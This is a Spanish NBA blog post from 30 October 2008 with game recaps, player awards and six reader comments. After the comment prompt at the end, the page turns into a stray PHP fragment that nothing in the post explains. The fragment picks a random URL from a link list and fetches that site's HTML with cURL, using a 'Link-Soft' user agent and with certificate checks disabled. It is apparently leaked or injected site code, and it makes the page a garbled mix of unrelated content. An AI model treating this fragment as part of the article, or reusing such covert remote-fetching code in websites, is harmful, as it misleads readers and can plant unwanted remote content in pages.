La crónica (29/10/08)

30 de October de 2008 por MagicJohnson32

amarespursPrimera noche de las de verdad, de las de 12 partidos, con muchas cosas que contar pero pocas sorpresas. Se podría destacar la mano de D’Antoni en los Knicks, que ya han empezado su particular merendola de puntos endosando 120 a Miami, o los Raptors, capaces de ganar a los Sixers en el Wachovia pese a ser  barridos en los tableros (23 rebotes de diferencia a favor de Brand y sus nuevos compañeros). También notable fue la victoria de los Hawks en Orlando, un inicio fuerte para su carrera hacia los lejanos Playoffs, con una interesante aportación de su banquillo y Flip Murray en el papel de Childress.

En los duelos descafeinados, los Suns, con un buen Shaquille, han ganado a Spurs a pesar de la increíble actuación de Parker & Duncan, que no dieron nunca su brazo a torcer; Los Jazz sin Williams han ganado a unos buenos Nuggets sin Carmelo y los Nets se han aprovechado de la escabechina de lesiones que ha sufrido Washington.

Por parte de los españoles, buen partido en general de todos los que jugaron. El mejor de la noche, Marc (12 puntos y 12 rebotes) ante el mismísimo Yao,marcyao aunque poco pudo hacer en una guerra que no es la suya. Calderón estuvo correcto y canalizó bien el juego de su equipo en la difícil victoria contra los Sixers. Seguramente, una parte del mérito de que fueran capaces de ganar en el tiro todo lo que perdieron en los tableros es suyo. Sus compañeros, en cambio, fueron los que brillaron, como suele ser habitual en su caso.

Pau también hizo un partido correcto en la paliza que los Lakers les dieron a sus vecinos. Su defecto, anoche, fue el tiro. Sus virtudes, los galones que mostró, la distribución del balón y su aportación defensiva y reboteadora. Buena jornada para los nuestros.

Veamos el resumen de los partidos disputados anoche antes de pasar a los premios:

Premios TJ
cbosh MVP: En una noche de muchos partidos es inevitable que abunden las grandes actuaciones. Nos quedamos, entre todas ellas, con la de Chris Bosh: 27 puntos con grandes porcentajes en tiros de campo y libres, además de 11 rebotes, 4 asistencias, 1 robo y un tapón. Y, sobre todo, porque lo hizo ante los Sixers de Brand y sirvió para que los Raptors venciesen en el Wachovia Center de Philadelphia. Boozer, Jefferson, Stoudemire, Chris Paul y David West son otros que han combinado grandes actuaciones con triunfo de su equipo.

El rookie: Todos pendientes del rendimiento de Beasley, y llega Chalmers para rozar el triple doble: 17 puntos, 7 rebotes y 8 asistencias con una sola pérdida de balón. No lo hizo mal Westbrook, 13 puntos, 4 rebotes y 4 asistencias. En el Kings-Wolves brillaron Jason Thompson, autor de 18 puntos y 10rebotes, y  Kevin Love, que debutó con 12 puntos, 9 rebotes, 2 asistencias y 2 tapones. Darrell Arthur consiguió 11 puntos, 15 rebotes y 2 tapones, y eclipsó a un fallón Mayo

La sorpresa: Jianlian debutó en su nuevo equipo con una buena actuación, 17 puntos, 6 rebotes, 2 asistencias y 2 tapones, además de victoria en la capital. Aunque la sorpresa de la noche es, posiblemente, la valentía de Mike D’Antoni sentando de inicio y durante todo el partido a Eddy Curry y Stephon Marbury. Y encima, ganan.

stephbenchLa decepción: Optaríamos por los 0 puntos para Bargnani en 20 minutos si no estuviésemos acostumbrados; pero elegimos los 4 puntos con 1 de 8 en tiros para un Kleiza  que fue titular y del que esperamos mucho más

El mayor esfuerzo en vano: 32 puntos de Duncan, otros tantos de Tony Parker, y derrota en casa ante los Suns para unos Spurs huérfanos de Ginóbili. Danny Granger, con grandísima actuación y 33 puntos en Detroit, también se gana un hueco en este apartado, así como los 22 puntos, 15 rebotes, 5 tapones y 5 recuperaciones de Dwight Howard.

Acabamos con las 10 mejores jugadas de la pasada madrugada:

Comenta

6 comentarios a esta entrada

  1. Txusma dice:
    #1

    Juas! 5 de 20 Mayo y 9 de 22 Gay. Sabía que estos se iban a jugar hasta las zapatillas pero no creia q llegarn al extremo de jugarse 42 tiros entre los 2!!

      Citar

  2. MagicJohnson32 dice:
    #2

    A mí lo que no me ha quedado claro es cómo quedó el derbi de L.A.

    ¿Al final hubo prórroga o no?

    😀

      Citar

  3. kantonyo dice:
    #3

    Yo destacaria sobre todo la contundencia con la que ha solucionado Lakers sus dos partidos contra Blazers y Clippers. La demostración de versatilidad de la plantilla, con Pau y Bynum dominantes en la pintura, Fisher cumpliendo, Bryant sobrado solo con la tercera marcha, Ariza pidiendo a gritos la titularidad, y el banquillo aportando bastante con Odom, un gran Farmar, Vujacic …. (se lo están tomando en serio…..)

    Por lo demás, me ha sorprendido la derrota de Sixers en casa con Toronto, parece que por ahora la pareja O’Neal-Bosh parece que funciona, aunque flojitos en rebotes. Muy buena defensa exterior de los Raptors, dejaron a Philadelphia con 34% de tiro y 17 perdidas, malisimo partido de Andre Miller e Iguodala. Tambien sorprendente la victoria de Atlanta en Orlando, ojo a esta plantilla joven pero con muchisimo talento.

    La noche pasada tambien ha puesto de manifiesto que Thunder, Kings e incluso Wizards, lo van a pasar muy mal esta temporada. De los tapados, habra que observar con lupa a NY y NJ no solo por que ganaron sino porque ofrecieron una buena imagen. Tambien Wolves ganó, con una grandisima actuación de Jefferson, pero se notó que el equipo debe pulirse mucho más, plantilla y margen de mejora tienen.

    Lo positivo yo diria que ha sido toda la generación de Rookies de este año, como ya dije hace tiempo, va a ser una de las mejores hornadas de los ultimos años, en el primer partido ya han dejado constancia: Rudy, Gasol, Darrell Arthur, Love, Chalmers, Rose, J.Thompson, Westbrook, B. Lopez y se espera mucho mas de Beasley, OJ Mayo y Oden.

      Citar

  4. kantonyo dice:
    #4

    En relación a Memphis, yo creo que la culpa de lo que pasa con OJ Mayo y Gay (el tipo tuvo el valor de repitir la misma jugada 6 veces, fallando todas y además cuando no habia posibilidad de rebote ofensivo) es culpa de Iavaroni, porque estos jugadores calidad de sobra tienen para hacer las cosas bien, pero si no hay mano dura, pues pasa lo que ayer paso y pasará….. Por cierto aunque en todos los sitios dicen que Marc hizo un gran partido, yo vi el encuentro a traves de NBA League Pass y la primera parte fue un poco horrosa, aun asi luego mejoró y terminó en buenos números, teniendo en cuenta que era su primer partido, está mas que aceptable… Me gustó muchisimo mas Darrell Arthur, 15 reb, 25 eff en 27 minutos!!!

      Citar

  5. TheDeerHunter dice:
    #5

    La verdad es que llama la atención el nivel de los rookies en esta jornada y poco que ha tenido lugar. Fundamentalmente porque según se oía decir a los expertos en la materia no se experaba tanto, quitando a Oden, Beasley y Rose.
    Hasta ahora se han salido… nosotros ya conocíamos de sobra a Rudy y Marc, pero tampoco esperábamos este impacto tan inmediato. Ambos han sido los mejores de sus respectivos equipos y eso es muy fuerte.
    Lo de Oden al final una micro-fractura de los huesos del pie. Puede que hasta un mesecito fuera. Preocupante.

    De NY&NJ… hay que esperar un poco para ver por donde se van a mover. Buena imagen, sí… pero rivales flojos a priori.

    Lakers como un tiro, en efecto… en partidos más difíciles de lo que parecen. Pau&Bynum tendrán que mejorar, a pesar de todo.

    PD: No me había dado cuenta de los de Bargnani. Es para caparlo.

      Citar

  6. Viva_Dirk dice:
    #6

    Los Raptors estuvieron muy bien como dice Tonyo en la defensa exterior, pero es dificil que puedan contener a un equipo como los Sixers bajo los aros, de hecho cuando tienen al cuarteto Iguodala-Young-Brand-Dalembert, son posiblemente el equipo mas físico de la competición.

    Hablando de los Raptors, si Jermaine esta centrado y en forma, que parece que lo esta, sus posibilidades suben como la espuma y el camino de los play-offs del Este se presenta cada vez mas jodido.

    Veo que nadie ha dicho nada del partidazo de Hawes con 12-14 y nada menos que 6 tapones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>